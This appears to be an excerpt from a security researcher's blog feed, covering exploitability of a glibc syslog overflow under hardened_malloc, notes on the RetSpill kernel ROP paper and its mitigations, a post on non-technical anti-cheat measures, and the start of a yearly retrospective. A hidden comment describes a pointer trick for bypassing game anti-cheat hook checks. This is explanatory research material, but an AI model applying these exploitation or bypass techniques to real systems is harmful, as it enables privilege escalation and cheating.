+<div class="codehilite"><pre><span></span><code><span class="mi">206</span><span class="w"> </span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="w"> </span><span class="p">((</span><span class="n">bufsize</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">));</span>
+<span class="p">...</span>
+<span class="mi">213</span><span class="w"> </span><span class="n">__snprintf</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span>
+<span class="mi">214</span><span class="w"> </span><span class="n">SYSLOG_HEADER</span><span class="w"> </span><span class="p">(</span><span class="n">pri</span><span class="p">,</span><span class="w"> </span><span class="n">timestamp</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">msgoff</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">));</span>
+<span class="p">...</span>
+<span class="mi">221</span><span class="w"> </span><span class="n">__vsnprintf_internal</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">l</span><span class="p">,</span><span class="w"> </span><span class="n">bufsize</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fmt</span><span class="p">,</span><span class="w"> </span><span class="n">apc</span><span class="p">,</span>
+<span class="mi">222</span><span class="w"> </span><span class="n">mode_flags</span><span class="p">);</span>
+</code></pre></div>
+
+<p>the tl;dr is that <code>bufsize</code> is <code>0</code> while <code>l</code> is user-controlled.
+As mentioned in the advisory, messing with nss structures as done
+in their (phenomenal) <a href="https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt"><code>Baron Samedit</code> sudo
+exploit</a>
+is a good way to get a root shell on the glibc.</p>
+<p>While the bug is in glibc's <code>syslog</code>, it's not unheard of for
+people to run custom allocators for performance/security/speed/… reasons.
+One of those could be, for example, <a href="https://github.com/GrapheneOS/hardened_malloc">hardened_malloc</a>,
+<a href="https://grapheneos.org">GrapheneOS</a>'s security-focused allocator, raising
+the question "would <code>hardened_malloc</code> make this particular bug
+unexploitable on my x86_64 Debian machine?"</p>
+<p>After discussing this with friends, we don't <em>think</em> that it makes
+the bug completely unexploitable, but ridiculously complicated, which is good
+enough™ for me. But keep in mind that this "analysis" was done hastily at 2am,
+so caveat lector.</p>
+<p><code>hardened_malloc</code> uses size-based slab isolation, popularised by
+<a href="https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/PartitionAlloc.md">PartitionAlloc</a>.
+Since <code>bufsize</code> is zero, this is a 1-byte
+allocation, falling into the
+<a href="https://github.com/GrapheneOS/hardened_malloc/blob/main/h_malloc.c#L147">16 bytes size-class</a>,
+the smallest after the special <code>0</code> one. So to exploit this, one would have to find an
+interesting object of size 16 bytes or lower to overwrite. But since
+canaries are enabled by default, this becomes even more difficult: sizes of
+allocations are actually bumped by 8 bytes, meaning that one would actually
+have to find an interesting object of size 8 bytes or lower.</p>
+<p>Moreover, 16-byte slabs can contain at most 256 allocations, and are
+surrounded by guard pages, meaning that accessing anything below <code>buf</code> and
+above <code>buf+(256*16)</code> will result in a crash.</p>
+<p>Allocations are randomized, which might help for bruteforcing the heap layout:
+if the current one isn't exploitable, just crash and start again. But it will
+also result in a lot more crashes, since <code>buf</code> might be allocated closer to
+the guard page.</p>
+<p>There are of course other mitigations, but they aren't relevant in this
+particular case, like canaries that are checked on <code>free</code>,
+or <a href="https://community.arm.com/arm-community-blogs/b/architectures-and-processors-blog/posts/enhanced-security-through-mte">ARM's MTE</a> that completely kills linear-overflows.</p>
+<p>Given the ludicrous amount of randomization <code>hardened_malloc</code> applies to heap bases (32G
+per region), bruteforcing offsets of anything not on the heap is futile.
+So one would have to find something interesting in an object of 8 bytes or less on
+the heap, like a path to corrupt as in <code>service_user</code>,
+or some partial-overwrite of a function-pointer to call a
+<a href="https://david942j.blogspot.com/2017/02/project-one-gadget-in-glibc.html">one-shot-gadget</a>, …</p>
+<p>Thanks to <code>strcat</code> for the handholding, and
+to <code>jdoe</code>, <code>drvink</code> and <code>J</code> for their diligent proofreading,</p>Paper notes: RetSpill2024-01-18T16:45:00+01:002024-01-18T16:45:00+01:00jvoisintag:dustri.org,2024-01-18:/b/paper-notes-retspill.html<ul>
+<li>Full title: RetSpill: Igniting User-Controlled Data to Burn Away Linux Kernel Protections</li>
+<li>PDF: <a href="https://dl.acm.org/doi/10.1145/3576915.3623220">ACM</a> —
+ <a href="https://kylebot.net/papers/retspill.pdf">mirror</a> —
+ <a href="https://dustri.org/b/files/papers/retspill.pdf">local mirror</a></li>
+<li>Authors: <a href="https://kylebot.net/">Kyle "kylebot" Zeng</a>,
+ <a href="https://ruoyuwang.me/">Ruoyu Wang</a>,
+ <a href="https://yancomm.net/">Yan Shoshitaishvili</a>,
+ and <a href="https://adamdoupe.com/">Adam Doupé</a> from <a href="https://shellphish.net/">Shellphish</a>,
+ along with <a href="https://zplin.me/">Zhenpeng Lin</a>,
+ <a href="https://www-users.cse.umn.edu/~kjlu/">Kangjie Lu</a>,
+ <a href="http://xinyuxing.org/">Xinyu Xing</a> and
+ <a href="https://www.tiffanybao.com/">Tiffany Bao</a>.</li>
+</ul>
+<p>The idea of the paper is to use user-controlled …</p><ul>
+<li>Full title: RetSpill: Igniting User-Controlled Data to Burn Away Linux Kernel Protections</li>
+<li>PDF: <a href="https://dl.acm.org/doi/10.1145/3576915.3623220">ACM</a> —
+ <a href="https://kylebot.net/papers/retspill.pdf">mirror</a> —
+ <a href="https://dustri.org/b/files/papers/retspill.pdf">local mirror</a></li>
+<li>Authors: <a href="https://kylebot.net/">Kyle "kylebot" Zeng</a>,
+ <a href="https://ruoyuwang.me/">Ruoyu Wang</a>,
+ <a href="https://yancomm.net/">Yan Shoshitaishvili</a>,
+ and <a href="https://adamdoupe.com/">Adam Doupé</a> from <a href="https://shellphish.net/">Shellphish</a>,
+ along with <a href="https://zplin.me/">Zhenpeng Lin</a>,
+ <a href="https://www-users.cse.umn.edu/~kjlu/">Kangjie Lu</a>,
+ <a href="http://xinyuxing.org/">Xinyu Xing</a> and
+ <a href="https://www.tiffanybao.com/">Tiffany Bao</a>.</li>
+</ul>
+<p>The idea of the paper is to use user-controlled data that are by design copied
+in kernel-land when exercising syscalls to store a <a href="https://en.wikipedia.org/wiki/Return-oriented_programming">ROP</a>-chain, via 4 main venues:</p>
+<ul>
+<li>Valid Data directly copied onto the kernel stack for performance reasons, like when
+ calling <code>poll</code>;</li>
+<li>Preserved Registers, restored upon returning from kernel-land to
+ userland. </li>
+<li>Calling Convention compliant functions will save/restore registers, and
+ apparently, system call handlers are calling convention compliant
+ even though the kernel is already taking care of those,
+ and syscalls can <a href="https://www.kernel.org/doc/html/latest/process/adding-syscalls.html?highlight=syscall_define#do-not-call-system-calls-in-the-kernel">only be called from userland</a>.
+ But even if the syscall handlers weren't compliant, registers still contain
+ userland values when they're called, and sub-functions might store/restore
+ those registers, since those do need to be compliant.</li>
+<li>Uninitialized Memory, since the per-thread kernel stack is reused between syscalls,
+ and not erased (unless <code>PAX_MEMORY_STACKLEAK</code> is used).</li>
+</ul>
+<p>Then, only a <a href="https://en.wikipedia.org/wiki/KASLR">KASLR</a> leak,
+a CFHP (control-flow hijacking primitive)
+and a <code>add rsp, X; ret</code>-like gadget are required to <a href="https://www.youtube.com/watch?v=FoUWHfh733Y">ROP all the things</a>.
+Nowadays, most™ CFHP are created by corrupting the heap to hijack function
+pointers, and since every kernel thread shares the same heap,
+once it is properly shaped, the control flow hijacking primitive can likely
+be triggered again and again from different threads.
+Moreover, changing the exploit is simply a matter of re-invoking a syscall with
+different data spill, instead of having to reshape the heap every single time.
+One doesn't have to worry about crashes (enabling lame bruteforcing), since no
+major Linux distribution (except CentOS, kudos) has <code>panic_on_oops</code> enabled,
+so having a ROP-chain crash is no big deal, because the CFHP is still on the
+heap, one syscall away.</p>
+<p>Since the space afforded to store gadgets might be too small, one trick is to
+invoke <code>do_task_dead</code> at the end of every ROP-chain to terminate it gracefully,
+and trigger the CFHP again and again.</p>
+<p>Mitigation-wise: </p>
+<ul>
+<li><a href="https://en.wikipedia.org/wiki/Control_register#SMEP">SMEP</a>,
+ <a href="https://en.wikipedia.org/wiki/Supervisor_Mode_Access_Prevention">SMAP</a> and
+ <a href="https://en.wikipedia.org/wiki/Kernel_page-table_isolation">KPTI</a> are irrelevant.</li>
+<li><a href="https://pax.grsecurity.net/docs/randkstack.txt">RANDKSTACK</a> mitigates data spillage from Preserved Registers and Uninitialized Memory,
+ but since it only provides 5 bits of randomness, a <code>ret</code>-sled is enough
+ to bypass it (25.44% of the time if using gadgets from Preserved Registers or Uninitialized Memory, 100% otherwise),
+ and in the absence of <code>panic_on_oops</code> it can quickly be bruteforced anyway.</li>
+<li><a href="https://en.wikibooks.org/wiki/Grsecurity/Appendix/Grsecurity_and_PaX_Configuration_Options#Sanitize_kernel_stack">STACKLEAK</a>,
+ <a href="https://en.wikibooks.org/wiki/Grsecurity/Appendix/Grsecurity_and_PaX_Configuration_Options#Forcibly_initialize_local_variables_copied_to_userland">STRUCTLEAK</a>,
+ and <a href="https://lwn.net/Articles/823152/">CONFIG_INIT_STACK_*</a>
+ only mitigate data spillage from Uninitialized Memory.</li>
+<li><a href="https://lwn.net/Articles/824307/">FG-KASLR</a> is <a href="https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/#gathering-useful-gadgets">useless</a>
+ since it doesn't randomize everything, leaving a couple (<code>42631</code> according to
+ the paper) of gadgets at position-invariant positions, which are enough to perform
+ arbitrary-reads and derandomize everything.</li>
+<li><a href="https://lore.kernel.org/lkml/202210010918.4918F847C4@keescook/T/#u">KCFI</a>
+ and <a href="https://www.intel.com/content/www/us/en/developer/articles/technical/technical-look-control-flow-enforcement-technology.html">IBT</a>
+ also (currently) don't cover everything, but don't really matter much here
+ anyway, since we only care about backward-edges, and as for the CFHP:</li>
+<li>There <a href="https://i.blackhat.com/USA-22/Wednesday/US-22-Jin-Monitoring-Surveillance-Vendors.pdf#page=35">are ways</a>
+ to obtain one in the presence of perfect forward-edge CFI with a heap corruption.</li>
+<li>Using <code>__x86_indirect_thunk_rdi</code> allows transforming a forward-edge control-flow transition into a backward-edge one.</li>
+<li>Shadow stack and perfect CFI are a pipe dream that would mitigate RetSpill,
+ but <a href="https://pax.grsecurity.net/docs/PaXTeam-H2HC15-RAP-RIP-ROP.pdf">PaX' RAP</a>
+ is really close to it, likely making it insanely hard, with its type-based
+ CFI, and its changing-on-every-syscall/task/… register-stored cookie paired
+ with unreadable kernel stacks for backward edge, on top of CFI.</li>
+</ul>
+<p>To showcase how cool all of this is, the paper comes with a semi-automated tool
+outputting the address of a stack-shifting gadget, a function to perform data
+spillage, invoke the triggering system call, and yield a root shell via a
+classic <code>commit_creds(init_cred)</code> + returning back to user space. It works by:</p>
+<ul>
+<li>taking full snapshots of a vm to locate the syscall leading to CFHP by using
+ a binary-search-like heuristic;</li>
+<li>mutating userland inputs (registers, <code>copy_from_user</code>/<code>get_user</code>
+ parameters, …), continuing the execution of the vm,
+ marking them as user-controllable data if the CFHP still
+ happens after modifications, and doing taint analysis to find how to modify
+ them.</li>
+<li>generating a ROP-chain, which isn't that easy, given that:</li>
+<li>it's done over discrete controlled regions</li>
+<li>there are some constraints, like "<code>eax</code> contains the syscall number",
+ or "<code>edx</code> comes from both <em>Saved Registers</em> and <em>Calling Convention</em>
+ spillages".</li>
+</ul>
+<p>Of course, given that some authors are <a href="https://angr.io/">angr</a> developers,
+<a href="https://github.com/angr/angrop">angrop</a> was used to knit the ROP-chains, and
+the results are pretty impressive:</p>
+<blockquote>
+<p>The abundance of data spillage allows 20 out of 22 proof-of-concept programs
+that manifest CFHP to be semi-automatically turned into full privilege escalation exploits.</p>
+</blockquote>
+<p>To kill this technique, the authors suggest:</p>
+<ol>
+<li><em>Preserved Register</em>: <code>RANDKSTACK</code> helps, but storing userspace registers
+ somewhere else than on the stack would be even better, eg. in <code>task_struct</code>.</li>
+<li><em>Uninitialized Memory</em>: enable <code>STACKLEAK</code>/<code>STRUCTLEAK</code>/<code>CONFIG_INIT_STACK_*</code>,
+ but the performance impact is pretty steep.</li>
+<li><em>Calling Convention</em> and <em>Valid Data</em>: an improved version of <code>RANDKSTACK</code>,
+ adding a random offset at the bottom of each stack frame, between <code>rsp</code> and user data.
+ This technique also mitigates Preserved Registers and Uninitialized Memory,
+ with an average performance overhead of 0.61%.</li>
+</ol>
+<p>Like all good papers it comes <a href="https://github.com/sefcom/RetSpill">with code</a>.</p>
+<p>Amusingly:</p>
+<ul>
+<li>RetSpill completely bypasses OpenBSD's
+ <a href="https://isopenbsdsecu.re/mitigations/map_stack/">MAP_STACK</a> mitigation,
+ should it ever be implemented in kernel-land, </li>
+<li>The <a href="https://org.anize.rs/">Organizers</a> CTF team
+ <a href="https://org.anize.rs/0CTF-2021-finals/pwn/kernote">used</a>
+ the <a href="https://elixir.bootlin.com/linux/latest/ident/pt_regs"><code>ptregs</code></a> structure
+ to store their ROP chain for <a href="https://ctftime.org/event/1357">0CTF/TCTF 2021
+ Finals</a>'s
+ <a href="https://ctftime.org/task/17461">Kernote</a> pwn challenge.</li>
+</ul>On non-technical video-games cheat mitigations2024-01-12T20:15:00+01:002024-01-12T20:15:00+01:00jvoisintag:dustri.org,2024-01-12:/b/on-non-technical-video-games-cheat-mitigations.html<p>Cheats are as old as video games, and will be there as long. There
+are a couple of high-profile players in the anti-cheat market today:
+<a href="https://en.wikipedia.org/wiki/BattlEye">BattlEye</a>,
+<a href="https://en.wikipedia.org/wiki/Valve_Anti-Cheat">Valve's VAC</a>,
+<a href="https://en.wikipedia.org/wiki/PunkBuster">PunkBuster</a>,
+<a href="https://easy.ac/en-us/">Epic's EAC</a>,
+<a href="https://wowpedia.fandom.com/wiki/Warden_(software)">Blizzard's Warden</a>,
+<a href="https://support-valorant.riotgames.com/hc/en-us/articles/360046160933-What-is-Vanguard-">Riot's Vanguard</a>,
+<a href="https://callofduty.com/en/warzone/ricochet">Activision's Ricochet</a>,
+… as well as in-house ones.</p>
+<p>To try to keep up in the race …</p><p>Cheats are as old as video games, and will be there as long. There
+are a couple of high-profile players in the anti-cheat market today:
+<a href="https://en.wikipedia.org/wiki/BattlEye">BattlEye</a>,
+<a href="https://en.wikipedia.org/wiki/Valve_Anti-Cheat">Valve's VAC</a>,
+<a href="https://en.wikipedia.org/wiki/PunkBuster">PunkBuster</a>,
+<a href="https://easy.ac/en-us/">Epic's EAC</a>,
+<a href="https://wowpedia.fandom.com/wiki/Warden_(software)">Blizzard's Warden</a>,
+<a href="https://support-valorant.riotgames.com/hc/en-us/articles/360046160933-What-is-Vanguard-">Riot's Vanguard</a>,
+<a href="https://callofduty.com/en/warzone/ricochet">Activision's Ricochet</a>,
+… as well as in-house ones.</p>
+<p>To try to keep up in the race, both sides are resorting to more and more
+privacy-invasive technical measures: streaming virtualised shellcodes,
+hardware fingerprinting and locking,
+<a href="https://secret.club/2020/01/05/battleye-stack-walking.html">stack-walking</a>,
+bootkit-like kernel drivers,
+<a href="https://en.wikipedia.org/wiki/Trusted_Platform_Module">TPM</a>/
+secure boot/
+<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/device-guard-and-credential-guard">HVCI</a>/
+<a href="https://en.wikipedia.org/wiki/Input%E2%80%93output_memory_management_unit">IOMMU</a>/
+<a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">VBS</a>/…
+<a href="https://support-valorant.riotgames.com/hc/en-us/articles/22291331362067-Vanguard-Restrictions">shenanigans</a>,
+hypervisors <a href="https://secret.club/2020/04/13/how-anti-cheats-detect-system-emulation.html">detection</a>/usage,
+<a href="https://secret.club/2020/03/31/battleye-developer-tracking.html">exfiltration of suspicious materials</a>,
+external <a href="https://en.wikipedia.org/wiki/Direct_memory_access">DMA</a> hardware,
+or other <a href="https://dustri.org/b/paper-notes-reversing-anti-cheats-detection-generation-cycle-with-configurable-hallucinations.html">more exotic things</a>.</p>
+<p>Yet anti-cheats are still routinely bypassed, less in a public manner, granted, but private
+and closed-community cheats are still flourishing, since it's a losing game by
+nature. And since games and anti-cheats are software, they're of course riddled
+with <a href="https://vice.com/en/article/d7y5wj/street-fighter-v-rootkit">hilarious</a> bugs leading to
+<a href="https://unknowncheats.me/forum/anti-cheat-bypass/614682-eac-dll-loading-method-eac-forcer.html">stupid</a>
+<a href="https://unknowncheats.me/forum/anti-cheat-bypass/503052-easy-anti-cheat-kernel-packet-fucker.html">bypasses</a>.</p>
+<p>But this isn't what this blogpost is about. Nowadays, cheats are considered as
+part of a larger problem: abuses and toxicity. Cheats aren't (only) hunted down
+because they're morally questionable, but because they disturb the way the game is meant to be
+enjoyed. Toxic and abusive behaviours lead to the very same results:
+A game that isn't fun to play because of cheating/abuse/toxicity issues will see its
+players number decrease, have poor reviews, … and won't make money. I'm sure
+there is a parallel to be made about the current state of our society, but I
+digress.</p>
+<p>For this article, we'll consider cheating and abuse/toxicity
+as a single issue under the term <em>abuse</em>.
+Now, because abuse isn't a purely technical issue, but also a social one, it
+can't be solved by technical solutions only, so let's have
+a look at what non-technical mitigations game developers are
+coming up with to curb this issue.</p>
+<p>The most obvious mitigation is to make cheating expensive, money wise.
+Having to pay 60EUR for a game is a steep investment, especially if one
+has to buy it again every time they get banned. This of course doesn't
+apply for free-to-play games, but can be emulated by having a cosmetics
+ecosystem, either to pay for, or to grind. The other expensive thing when
+playing video games is the hardware, and bans can be tied to it.</p>
+<h2>Global measures</h2>
+<p>The <em>big</em> mitigation at this level is reputation systems. They're based on
+people who know best how a fun and fair game should go: players. After a
+match, they're encouraged to cast votes on how fair it was, on a match level,
+but also directly at players level: "Bob was really looking out for others",
+"Bob was a team player", and so on. For negative behaviour, reports don't have
+to wait for the end of the match, players can report
+cheating, being offensive in the text/voice chat, <a href="https://en.wikipedia.org/wiki/Griefer">griefing</a>,
+queue dodging, <a href="https://www.urbandictionary.com/define.php?term=smurfing">smurfing</a>, …
+Of course, slanderous reports are penalised.</p>
+<p>Peer pressure is a good lever too, by taking action not only against cheaters,
+but also against people benefiting from the cheat, like regular teammates.</p>
+<p><a href="https://en.wikipedia.org/wiki/Bug_bounty_program">Bug bounty programs</a> are now commonplace,
+so it's only logical that there are now <a href="https://hackerone.com/riot">some</a>
+rewarding anti-cheat bypasses/exploits. The rewards are a bit cheap for now,
+but will likely rise up as the programs mature. The positive effects are
+multiple:</p>
+<ol>
+<li>It increases the incentives to report issues to get them fixed: a player
+ finding a glitch/exploit can now get some cash for the discovery</li>
+<li>As more abuse vectors are killed, the reward prices will rise, and it might
+ become more profitable to report bugs than to sell them to cheat providers.
+ This isn't unheard of, with <a href="https://google.github.io/security-research/kernelctf/rules.html">Google's
+ kernelCTF</a>
+ paying two times more than Zerodium.</li>
+<li>If the bug bounty program is correctly managed, the probability of getting a
+ given amount of money for reporting an issue will be higher than using it in
+ a cheat for an unknown period of time until it gets fixed.</li>
+<li>It will likely increase the amount of people looking for issues and willing
+ to report them.</li>
+</ol>
+<p>Community managers can also regularly <s>spread <a href="https://en.wikipedia.org/wiki/Fear,_uncertainty,_and_doubt">FUD</a></s>
+post updates about ban waves, anti-cheat measures, reports, … to make it
+clear that abusive behaviours are something being taken care of,
+and a dangerous gamble for players to take part in. I think
+I have seen some people spending time proving that some cheaters' live streams
+were in fact recycled pre-recorded footage from an earlier version of the game,
+because some of the game details have been updated in the meantime.</p>
+<h2>Accounts-level measures</h2>
+<p>Some game stores, like <a href="https://en.wikipedia.org/wiki/Steam_(service)">Steam</a>,
+have an account-level "cheater" mark, meaning that if someone gets banned from a game for cheating,
+other games can know about it. But more importantly,
+<a href="https://en.wikipedia.org/wiki/Achievement_(video_games)">achievements</a>
+and cosmetics are also tied to an account, and as mentioned previously,
+those are non-zero time and/or money investments. Getting banned means losing
+them. This of course only deters opportunistic cheaters,
+as people can simply create other accounts to cheat, but this can be made
+harder via purely technical means.</p>
+<p>Most <em>competitive</em> online games have ranked and casual game modes, with the
+former being only accessible after having spent a certain amount of time in the
+latter one. Meaning that one has to do it again every time they get banned,
+or <a href="https://en.wikipedia.org/wiki/Boosting_(video_games)">pay someone to do it</a>.
+Some studios are even making players go through more hoops to be able to play, like requiring
+<a href="https://en.wikipedia.org/wiki/Multi-factor_authentication">MFA</a>,
+or playing a couple of matches against <a href="https://en.wikipedia.org/wiki/Video_game_bot">bots</a>
+branded as a tutorial, before being able to play with other people. There is of
+course a fine balance to keep to annoy abusers but not legitimate players.</p>
+<h2>Player-level measures</h2>
+<p>The goal of non-technical measures isn't to make it impossible to be abusive,
+but to make it not worth it. Moreover, issuing instahwpermabans to <a href="https://en.wikipedia.org/wiki/Edgelord">edgelords</a>
+seems a tad heavy-handed, so having a large panel of measures against abusers makes sense:
+one might want to allow people to rectify their behaviour, to isolate them to
+cool down, and so on. It might include textual warnings, temporary bans, kick
+from the current game, chat/voice mute, losing access to ranked play,
+reducing the amount of earned experience points, …</p>
+<p>Players are abusive for various reasons, but I'd argue that most do because
+it's fun. Ruining the fun for them is thus a good way to curb such behaviours.
+A simple way to do this is to make them play together, by grouping players
+by reputation, or by having servers with technical anti-cheat measures
+explicitly disabled. But there are even more creative measures,
+like <a href="https://www.callofduty.com/en/blog/2023/11/call-of-duty-ricochet-anti-cheat-modern-warfare-III-progress-report">disabling their parachute</a>,
+reducing their damage output to ridiculous levels, taking away their weapons,
+<a href="https://www.callofduty.com/blog/2023/06/call-of-duty-ricochet-anti-cheat-season-04-update">making other legitimate players invisible to them</a>,
+randomly drop some of their inputs,
+<a href="https://dustri.org/b/paper-notes-reversing-anti-cheats-detection-generation-cycle-with-configurable-hallucinations.html">hallucinations</a>, … and
+while this costs a bit more engineering time than simply grouping them
+together, it has a couple of high-value returns on investment:
+- allowing game developers to spend more time collecting data on how cheats are working on a technical level,
+- reducing the impact cheaters have on a game makes it possible to
+ significantly defer banning them without impacting other players too much,
+ making it harder for cheat makers to pinpoint how and why a cheat was
+ detected.
+- it's absolutely hilarious</p>
+<h2>Examples</h2>
+<h3><a href="https://en.wikipedia.org/wiki/Tom_Clancy's_Rainbow_Six_Siege">Rainbow Six Siege</a></h3>
+<ul>
+<li>It uses BattlEye, and in late 2022/early 2023 banned around
+ <a href="https://ubisoft.com/en-us/game/rainbow-six/siege/news-updates/2g7hT2NNuOqrj35RfgsFxN/anticheat-status-update-march-2023">5000</a>
+ accounts per month, which is a lot, but also shows that it doesn't deter
+ cheaters.</li>
+<li>The game costs <a href="https://store.steampowered.com/app/359550/Tom_Clancys_Rainbow_Six_Siege/">$8</a>,
+ but if you want to have access to all the operators, it's $70. One can also
+ unlock operators by playing, which takes several hundreds of hours.</li>
+<li>To play ranked, one needs to reach <a href="https://ubisoft.com/en-gb/game/rainbow-six/siege/news-updates/4hShcX2HZTG2ttIi3IIN9Y/matchmaking-rating">level 50</a>,
+ which takes around 50h, give or take.</li>
+<li>The game has a rich ecosystem of cosmetics
+ that can be <a href="https://store.ubisoft.com/us/dlc-type-skins-cosmetics">purchased for steep prices</a>,
+ and painstakingly earned by playing,
+ that would be lost in case of an account ban.</li>
+<li>Friendly fire will result in the damages being applied to the shooter
+ should it be reported as voluntary by the player at the receiving end.</li>
+<li>It's developing a pretty involved <a href="https://ubisoft.com/en-gb/game/rainbow-six/siege/news-updates/22JLMFeayzuamhb7YKbAjm/reputation-system-activation-more">reputation system</a>,
+ where people with a "positive" behaviour get rewarded (more experience
+ points, cosmetics, …), while those with a "negative" one
+ might be prevented from playing <em>ranked</em>,
+ get less experience points,
+ …</li>
+</ul>
+<h3><a href="https://en.wikipedia.org/wiki/Call_of_Duty:_Modern_Warfare_II_(2022_video_game)">Call of Duty: Modern Warfare II</a>:</h3>
+<ul>
+<li>The game costs <a href="https://store.steampowered.com/app/1962660/Call_of_Duty_Modern_Warfare_II/">$70</a>.</li>
+<li><a href="https://callofduty.com/blog/2023/02/call-of-duty-modern-warfare-II-ranked-play-features-challenges-rewards">"Players must be at least Level 16 to access Ranked Play"</a>,
+ but this can be done in a couple of hours.</li>
+<li>Cheating results in account-wise permaban across all Call of Duty titles.</li>
+<li>Banned accounts have their records purged from leaderboards.</li>
+<li>Players engaging in "negative" behaviours might get
+ muted on chat/voice, … and interestingly, cheaters
+ are going to get paired with other cheaters in matchmaking.
+ <a href="https://support.activision.com/articles/call-of-duty-security-and-enforcement-policy">Players who are often playing with the same cheaters</a> (boosting),
+ will also get their reputation tanked.</li>
+</ul>
+<h3><a href="https://playvalorant.com/">Valorant</a></h3>
+<p>Its developer even published a
+<a href="https://playvalorant.com/en-us/news/tags/game-health-series/">great series of blogposts</a> on
+what it calls "game health".</p>
+<ul>
+<li>The game is free-to-play, but comes with <em>a lot</em> of <a href="https://valorantstrike.com/valorant-store/">cosmetics</a>.</li>
+<li>Cheaters get a permaban, but people benefiting from them might get a 6 months one as well.</li>
+<li>Players joining games and <a href="https://playvalorant.com/en-gb/news/dev/valorant-behavior-detection-and-penalty-updates/">idling to reap out experience points</a>,
+ doing nothing but kneecapping their team will <a href="https://playvalorant.com/en-us/news/dev/valorant-systems-health-series-afk/">get penalised</a>.</li>
+<li>Players are encouraged to report toxic behaviours, and to not engage,
+ since engagement might be penalized as well</li>
+<li>Players using,
+ <a href="https://support-valorant.riotgames.com/hc/en-us/articles/360044791253-Inappropriate-In-Game-Names">certain words</a>
+ whether in chat or as username,
+ will be flagged as toxic.</li>
+<li>Penalties come in various sizes, shapes and durations, allowing to fine tune
+ according to behaviour: warnings, voice/chat restrictions,
+ reduction in experience points
+ gain, reduction in ranked rating, increased queue waiting time, ranking game
+ ban, global ban.</li>
+<li>Valorant <a href="https://playvalorant.com/en-us/news/dev/valorant-systems-health-series-smurf-detection/">published</a>
+ their approach to mitigate smurfing; acknowledging that while having multiple accounts
+ to smurf/trade/evade bans/… is not desirable, some people are using
+ them to play with friends with a better/worse ranked level.
+ So while they took measures to detect and mitigate having multi-accounts,
+ they also relaxed the maximum ranks difference for players to play together,
+ which significantly reduced the number of alt-accounts usage,
+ but also didn't alter match fairness in a measurable way.</li>
+</ul>
+<h2>Conclusion</h2>
+<p>This is all nice and dandy, but is it working? According to
+data from <a href="https://www.ubisoft.com/en-us/game/rainbow-six/siege/player-protection">Rainbow Six Siege</a>,
+<a href="https://playvalorant.com/en-us/news/tags/game-health-series/">Valorant</a>,
+<a href="https://www.callofduty.com/blog/2023/06/call-of-duty-ricochet-anti-cheat-season-04-update">Call of Duty: Modern Warfare 2</a>,
+… those measures are indeed working pretty well,
+and are likely providing better results than technical-only
+measures. They are also cheaper, since steering people away from toxic
+behaviours doesn't reduce the number of players as much as banning them
+outright. It's nice to see that the video game industry realised that cheating and
+abuses/toxicity could be addressed in similar non-technical ways, and that both
+approaches are complementary. This is a stark contrast to other ones,
+where techno-solutionism is seen as the only possible remedy, even more so
+in our machine-learning-all-the-things era. </p>
+<h2>Sources and resources</h2>
+<ul>
+<li><a href="https://youtube.com/watch?v=hI7V60r7Jco">Anti-Cheat for Multiplayer Games</a></li>
+<li><a href="https://secret.club/">Secret Club</a></li>
+<li><a href="https://unknowncheats.me/">UnKnoWnCheaTs</a></li>
+</ul>
+<!--
+
+Steam's VAC was already doing basic stuff, like hashing the entire code region of the game on launch, storing the hash, and then re-hashing the code region every few minutes to see if someone had changed the code, presumably to install a trampoline and hook into the game's functions (to write aimbots, wallhacks, etc). When a hash change is detected, the player is banned.
+
+Cheaters found a way to bypass this by simply finding the function they desired to hook and setting any random function pointer within it to 0 (stored in rw memory, so doesn't trigger the code region hash mentioned above). This would trigger an exception, which the cheat developer would catch with Windows' SEH/VEH, effectively giving them a hook into the function without having to modify the code region.
+
+Activision's anti-cheat would then go through a bunch of function pointers (the ones in network/rendering functions mostly, since that's where you'd want to hook to write cheats) and check for null pointers. If a pointer was null, they'd ban you.
+
+Funny enough, this was incredibly easy to bypass: just set the pointer to 1, or 2, or 3, or ...!! All of these addresses are most likely still invalid and they'll still trigger an exception, even though they're theoretically valid pointers, giving you a de-facto hook into the game that bypassed both VAC and BO2's anticheat, and was pretty much unpatchable. Perhaps that's why they started being annoying and banning people for running IDA, Cheat Engine, etc., which are certainly probable indicators but definitely not hard evidence for cheats.
+
+-->2023 in retrospect2023-12-31T23:59:00+01:002023-12-31T23:59:00+01:00jvoisintag:dustri.org,2023-12-31:/b/2023-in-retrospect.html<p>In 2023, I did, amongst other things:</p>
+<ul>
+<li>Donated some money:<ul>
+<li>$400 to <a href="https://fsfe.org/">FSFE</a></li>
+<li>$5000 to <a href="https://noyb.eu">NOYB</a></li>
+<li>$5000 to <a href="https://riseup.net">Riseup</a></li>
+<li>$5000 to the <a href="https://archive.org">Internet Archive</a></li>
+<li>$5000 to the <a href="https://en.wikipedia.org/wiki/Planned_Parenthood">Planned Parenthood Federation of America</a></li>
+<li>$1000 to <a href="https://daysforgirls.org">days for girls</a>, on the advice of <a href="https://foreignbystander.com/">chik</a> from <a href="https://darkscience.net">darkscience</a>.</li>
+<li>$200 each, as a <a href="https://opensource.googleblog.com/search/label/peer%20bonus">Open Source …</a></li></ul></li></ul><p>In 2023, I did, amongst other things:</p>
+<ul>
+<li>Donated some money:<ul>
+<li>$400 to <a href="https://fsfe.org/">FSFE</a></li>
